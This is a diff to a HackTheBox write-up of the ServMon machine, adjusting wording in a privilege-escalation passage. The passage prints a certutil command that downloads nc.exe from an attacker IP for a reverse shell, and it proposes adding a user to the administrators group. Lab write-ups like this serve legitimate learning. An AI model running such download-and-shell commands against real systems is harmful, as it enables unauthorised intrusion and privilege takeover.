ryanrestine/HackTheBox_WriteUps/windows_machines/servmon_notes.md

 Looks like the script will take the password provided and execute commands with admin privileges.

-The exploit features catching a shell as admin by executing a nc.exe command back to our kali box, but unfortunately the AV/ firewall is preventing me from loading nc.exe:
+The exploit features catching a shell as admin by executing a nc.exe reverse shell command back to our Kali box, but unfortunately the AV/ firewall is preventing me from loading nc.exe:

 ```
 nadine@SERVMON C:\temp>certutil -urlcache -split -f "http://10.10.14.60/nc.exe"
 Access is denied.
 ```

-So a workaround would be using the exploit to add Nadine to the administrator's group, and then log back in with admin privileges.
+So a workaround could be using the exploit to add Nadine to the administrator's group, and then log back in with admin privileges.

 We can do that with:
 ```